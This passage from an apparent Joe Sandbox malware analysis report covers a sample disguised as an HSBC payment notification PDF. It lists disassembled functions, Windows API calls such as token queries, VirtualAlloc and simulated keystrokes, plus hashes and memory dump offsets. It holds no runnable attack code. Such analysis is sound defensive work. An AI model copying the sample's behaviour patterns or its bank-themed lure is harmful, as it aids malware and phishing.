Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 5e403c8a90df1ee0e06371f2d57000cd02bd76b5d635224a6d232ab0319aed21
Instruction ID: e65952a518aebd30c2be6c87fe4ab6250acd6cacf129c027b051fb699af34d37
Opcode Fuzzy Hash: 5e403c8a90df1ee0e06371f2d57000cd02bd76b5d635224a6d232ab0319aed21
Instruction Fuzzy Hash: 85F01CB1501711CFCB349F64E494817B7E1BF94369320893FE2D692650C7359844DB84

Function 0099BC0C Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32 ref: 0099BAFD

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: db052e7b7a0fe41664f7805e91668eff1386473e4c0cfcd62c4c6024b9e46cad
Instruction ID: 40adb29618d2155944b625265952c89ec3887a93da9e906efec6ed06693a81ac
Opcode Fuzzy Hash: db052e7b7a0fe41664f7805e91668eff1386473e4c0cfcd62c4c6024b9e46cad
Instruction Fuzzy Hash: A5F0A0A0C0C3408ADF20BB8CA61823A7AB8ABA2353F4A855EE48847591E77D8C048653

Function 00420791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004207B0

Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: 5311bc10bcd02c3da6376a961da6fa5eeea3c1e89524b7fc1d9ecfef85fbf38f
Instruction ID: 9246c12fdc37fcd41ca4db90d4c6e7f6585ba1f285f6c4ea688713946de2f6cd
Opcode Fuzzy Hash: 5311bc10bcd02c3da6376a961da6fa5eeea3c1e89524b7fc1d9ecfef85fbf38f
Instruction Fuzzy Hash: F5E0263290012817C720E2599C05FEA77ACDF882A0F0401BAFC0CD3204D964AC808694

Function 00468E9F Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00468EC1

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
Instruction ID: 3b5d1e22e3b7b83ea6e308f8ce2403907d65c91d4ff9c09852f69d04d9ef645c
Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
Instruction Fuzzy Hash: BDE092B0204B005BD7388A24D800BA373E1AB05304F00091EF2AAC3341EB67B841C75D

Function 00998318 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),?,?), ref: 0099832A

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 9a095d05f3dc9ad48d2003d659272b558181567341f2e719abc76d76c56e94fa
Instruction ID: 51e2aabe81cf9d2f89f4e3594b56382fa26c3139d0a5ca0496f673b7da10b92e
Opcode Fuzzy Hash: 9a095d05f3dc9ad48d2003d659272b558181567341f2e719abc76d76c56e94fa
Instruction Fuzzy Hash: D5E0C23824DB417FDF3207288C01A3F2F2CABD7BC0F48048DB460920A7CD144C005228

Function 0099AAE0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32 ref: 0099AAFF

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 45ebdb760944c9e13515538df194eb117da1d334fdf6bb3c09018ba379e2b1f5
Instruction ID: 833eac716ed07b1064d5dd67c1642fee8cf93d7afa954c5d8caac41f920a6244
Opcode Fuzzy Hash: 45ebdb760944c9e13515538df194eb117da1d334fdf6bb3c09018ba379e2b1f5
Instruction Fuzzy Hash: E0E04F7450E7869FE7019F30850531ABFF5EF86604F44898EE9C446191D7B98549DB42

Function 0099A08F Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32 ref: 0099A190

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: b8d8d7c4d3b4322f123acefd2a9521c29eda310754e4238f8fb8702a69d96a71
Instruction ID: f1952bc8ef1c6ef47a21de290d20644b4e45713b11072cb222179105c6161caa
Opcode Fuzzy Hash: b8d8d7c4d3b4322f123acefd2a9521c29eda310754e4238f8fb8702a69d96a71
Instruction Fuzzy Hash: F8D0A95288D2016AAE3E1B3D8C0C43A0A4CC9B3332F8D034B9823C30F1A4129D08C0E3

Function 0099BADE Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32 ref: 0099BAFD

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 07ac131828644eff4d8340fdbb6fbc9d1c5320efb3bebd9609924233967aebaf
Instruction ID: f0bc29b80f5be22adffe297ca1890be674a4c881288c328db21139b39fffe20d
Opcode Fuzzy Hash: 07ac131828644eff4d8340fdbb6fbc9d1c5320efb3bebd9609924233967aebaf
Instruction Fuzzy Hash: 2EE086A080D3815EDF106B5C96493297FA4ABA6341F06C55AE4D845091DB7E08444743

Function 0099AB15 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32 ref: 0099AAFF

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 6b5830783cd263629da1f0fd3b87b05685987f3fcb85c134729de144118da653
Instruction ID: 32adcc8dc1c0d3fc202e9ef52b9faac9614693c7f4e6b5f754d15117645a2763
Opcode Fuzzy Hash: 6b5830783cd263629da1f0fd3b87b05685987f3fcb85c134729de144118da653
Instruction Fuzzy Hash: A5E0863450D7009FDB409F69C50876777F5FFD8714F40C90CE88485100E7789984CB82

Function 0099ADBD Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32 ref: 0099AEED

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: e98b83e7949aa8abec16f27514a6d745b2c1873faccf4b93ad832f66a92d7ac1
Instruction ID: f7069b6330330ecd0e52d4049927ee47eb7c8f77bcea6b894490399b83815f63
Opcode Fuzzy Hash: e98b83e7949aa8abec16f27514a6d745b2c1873faccf4b93ad832f66a92d7ac1
Instruction Fuzzy Hash: C1D0177590D350DBCF10AF89980839AFFE8EB96724F408B4EE4A846180C3B44644EBC7

Function 0099A0F0 Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32 ref: 0099A0F6

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 93015f98e23a0df36ac7c9af55408ec7ef1a21459b97f597072902b1abb5d781
Instruction ID: cc79f0240204c6973da75d42028ba31de86cf1a3976f00f3bd34dacea1a19296
Opcode Fuzzy Hash: 93015f98e23a0df36ac7c9af55408ec7ef1a21459b97f597072902b1abb5d781
Instruction Fuzzy Hash: 04D0C96080E3408AEF2A5B1C68482BA6B6C9B623B8F1A078ED071C40F1D2394D8CD253

Function 00999E97 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32 ref: 00999EB5

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: a651a97e7981483c5c98838fc0787a491ac67fd1d5e2aaf79dcbb4d35bcedf3a
Instruction ID: ad02c295b9fbb4626a47a54f8ca3b72d3900e5c293ae354e8e31ba5f32cf0e8f
Opcode Fuzzy Hash: a651a97e7981483c5c98838fc0787a491ac67fd1d5e2aaf79dcbb4d35bcedf3a
Instruction Fuzzy Hash: 0BD012B065C3004FEF00AF51888931AF7D1F785349F40C82DD19507280C3B9440DCB42

Function 0099AD84 Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,0000004C,?,00000000), ref: 0099AD99

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 91e88f9b3b4c88f890e0afda11e0cf9dbc131a77899fe63dca5829dd4ba1cf78
Instruction ID: 575696072de64108ae042780d5548b791782fec9b6a3b7bf435160984bc2469c
Opcode Fuzzy Hash: 91e88f9b3b4c88f890e0afda11e0cf9dbc131a77899fe63dca5829dd4ba1cf78
Instruction Fuzzy Hash: 78D0CA2180E3C08FCB17672548240217FBA9A8B22230A80C780928B1A3A4288C08C367

Function 0042525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00425266

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 26467e9723955137fe9c45439b6ceb4f873de5a2d7ef111d81715968119f48b2
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 99B0927654020CB7CE012A82FC02A593B199B41768F8080A1FB0C181A2A677A6649A99

Function 0099823E Relevance: 1.3, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetSidSubAuthorityCount.ADVAPI32 ref: 00998199
CloseHandle.KERNEL32(00000000,?,?,?,?,00995563), ref: 009981EB
GetCurrentProcess.KERNEL32(?,?,?,00995563), ref: 0099826F
GetTokenInformation.KERNELBASE(?,?,?,?,?,00995563), ref: 00998280
GetLastError.KERNEL32(?,?,?,?,00995563), ref: 0099828E

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: AuthorityCloseCountCurrentErrorHandleInformationLastProcessToken
String ID:
API String ID: 85819701-0
Opcode ID: 79d47148e0c3b8c5f488f9274f4ba4620b0df2a96e4a48fb02a108d272d164a1
Instruction ID: 7648d9ee88398a164dafa53a7cd215fc7bd546143170c773c20c297ec8d785d0
Opcode Fuzzy Hash: 79d47148e0c3b8c5f488f9274f4ba4620b0df2a96e4a48fb02a108d272d164a1
Instruction Fuzzy Hash: CCE04825E9D2009BDD37172C5D5D57B2A6C552336471D055FDC2287372ED258C069162

Function 00998249 Relevance: 1.3, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,?,?,?,00995563), ref: 009981EB

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: b530ab68e3f7a972cf4d7391fd9766949e59625d3b30fb272a331edac96297a3
Instruction ID: 892e42b297fd3f9862d167335e48979463488af2686e3e9e797fe424a45b95de
Opcode Fuzzy Hash: b530ab68e3f7a972cf4d7391fd9766949e59625d3b30fb272a331edac96297a3
Instruction Fuzzy Hash: 18D0A73AB0E601974D765B2C4D4893F6E4CBA63BF1B59071DEC32C2695FE24DC1290A6

Function 00C41218 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000001F4), ref: 00C41229

Memory Dump Source

Source File: 00000001.00000002.1386641786.0000000000C3E000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C3E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c3e000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 19f1c6e90543405d0070af8cd77c1a033dd4a64e117b045a572294932aa357b9
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 05E0E67494010DDFDB00DFB4D5496DD7BB4FF04301F100161FD01D2280D6709D508A62

Function 00995917 Relevance: 1.3, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 009958FC

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: d9a492d747383b794058a1c5fd06ac61c03a2dc7a7720a912c22dbeb4051a62c
Instruction ID: 2aaadf50175b27375b244d8dcca294460d7675bee7b9c226f612a955a316dc6c
Opcode Fuzzy Hash: d9a492d747383b794058a1c5fd06ac61c03a2dc7a7720a912c22dbeb4051a62c
Instruction Fuzzy Hash: 47D0A7D094CA84F7DF179A2F6C9A93B255D66287003478D57BC42CA155D528CD00EBE3

Function 00995BC0 Relevance: 1.3, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00994F02,00000060), ref: 00995BD3

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 223d67945c604599ca9ea1c839f42314722c4395a48f8baff382079c070ed523
Instruction ID: ff0d8c265a0d38689f943f1e8218b8f6e9431e4902022f769167a6a7e10046fb
Opcode Fuzzy Hash: 223d67945c604599ca9ea1c839f42314722c4395a48f8baff382079c070ed523
Instruction Fuzzy Hash: 83C09B386C97456DED37575C8C5DF55271C5740711F054141B349D54F051710440D719

Non-executed Functions

Function 0048CABC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 632windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0048CB37
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CB95
GetWindowLongW.USER32(?,000000F0), ref: 0048CBD6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048CC00
SendMessageW.USER32 ref: 0048CC29
_wcsncpy.LIBCMT ref: 0048CC95
GetKeyState.USER32(00000011), ref: 0048CCB6
GetKeyState.USER32(00000009), ref: 0048CCC3
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CCD9
GetKeyState.USER32(00000010), ref: 0048CCE3
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048CD0C
SendMessageW.USER32 ref: 0048CD33
SendMessageW.USER32(?,00001030,?,0048B348), ref: 0048CE37
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0048CE4D
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0048CE60
SetCapture.USER32(?), ref: 0048CE69
ClientToScreen.USER32(?,?), ref: 0048CECE
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0048CEDB
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0048CEF5
ReleaseCapture.USER32 ref: 0048CF00
GetCursorPos.USER32(?), ref: 0048CF3A
ScreenToClient.USER32(?,?), ref: 0048CF47
SendMessageW.USER32(?,00001012,00000000,?), ref: 0048CFA3
SendMessageW.USER32 ref: 0048CFD1
SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D00E
SendMessageW.USER32 ref: 0048D03D
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0048D05E
SendMessageW.USER32(?,0000110B,00000009,?), ref: 0048D06D
GetCursorPos.USER32(?), ref: 0048D08D
ScreenToClient.USER32(?,?), ref: 0048D09A
GetParent.USER32(?), ref: 0048D0BA
SendMessageW.USER32(?,00001012,00000000,?), ref: 0048D123
SendMessageW.USER32 ref: 0048D154
ClientToScreen.USER32(?,?), ref: 0048D1B2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0048D1E2
SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D20C
SendMessageW.USER32 ref: 0048D22F
ClientToScreen.USER32(?,?), ref: 0048D281
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0048D2B5

Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC

GetWindowLongW.USER32(?,000000F0), ref: 0048D351

Strings

F, xrefs: 0048D235
pbL, xrefs: 0048CEAF
@GUI_DRAGID, xrefs: 0048CE9C

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F$pbL
API String ID: 3977979337-2097280626
Opcode ID: 4af15b1d74f5ceb569f81a2242e5ab9552bfc6f03819da6794c6277fd3238044
Instruction ID: aa2ec0652ddf211ac3aa7531e5acae26c7b16f0e73498be5a03c601873f34f9f
Opcode Fuzzy Hash: 4af15b1d74f5ceb569f81a2242e5ab9552bfc6f03819da6794c6277fd3238044
Instruction Fuzzy Hash: FE42DE74604640AFC720EF24D888EAEBBE5FF48310F140A2EF559973A1C735E855DB6A

Function 00416F9E Relevance: 55.8, APIs: 19, Strings: 10, Instructions: 5018COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004171C3
_memset.LIBCMT ref: 00417539
_memmove.LIBCMT ref: 004176AC

Strings

[:<:]], xrefs: 00417479
\b(?=\w), xrefs: 00453769
\b(?<=\w), xrefs: 00453773
[:>:]], xrefs: 00417492
3cA, xrefs: 004523A0
P\K, xrefs: 00451AB8
]K, xrefs: 00451A22
Q\E, xrefs: 00417FCB
DEFINE, xrefs: 00452103
_A, xrefs: 004523CB

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: _memmove$_memset
String ID: ]K$3cA$DEFINE$P\K$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_A
API String ID: 1357608183-1426331590
Opcode ID: b28a790e45669a4902d64bf1598fd7c3bcb7bf2305bb98875f8069baf6f44106
Instruction ID: 24ac3008a4780d7342888deeabfce4e0a58b67e9339f094d14e98286774badb8
Opcode Fuzzy Hash: b28a790e45669a4902d64bf1598fd7c3bcb7bf2305bb98875f8069baf6f44106
Instruction Fuzzy Hash: A193A471A002199BDB24CF58C8817EEB7B1FF48315F24815BED45AB392E7789D86CB48

Function 004048D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 004048DF
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0043D665
IsIconic.USER32(?), ref: 0043D66E
ShowWindow.USER32(?,00000009), ref: 0043D67B
SetForegroundWindow.USER32(?), ref: 0043D685
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0043D69B
GetCurrentThreadId.KERNEL32 ref: 0043D6A2
GetWindowThreadProcessId.USER32(?,00000000), ref: 0043D6AE
AttachThreadInput.USER32(?,00000000,00000001), ref: 0043D6BF
AttachThreadInput.USER32(?,00000000,00000001), ref: 0043D6C7
AttachThreadInput.USER32(00000000,?,00000001), ref: 0043D6CF
SetForegroundWindow.USER32(?), ref: 0043D6D2
MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D6E7
keybd_event.USER32(00000012,00000000), ref: 0043D6F2
MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D6FC
keybd_event.USER32(00000012,00000000), ref: 0043D701
MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D70A
keybd_event.USER32(00000012,00000000), ref: 0043D70F
MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D719
keybd_event.USER32(00000012,00000000), ref: 0043D71E
SetForegroundWindow.USER32(?), ref: 0043D721
AttachThreadInput.USER32(?,?,00000000), ref: 0043D748

Strings

Shell_TrayWnd, xrefs: 0043D660

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
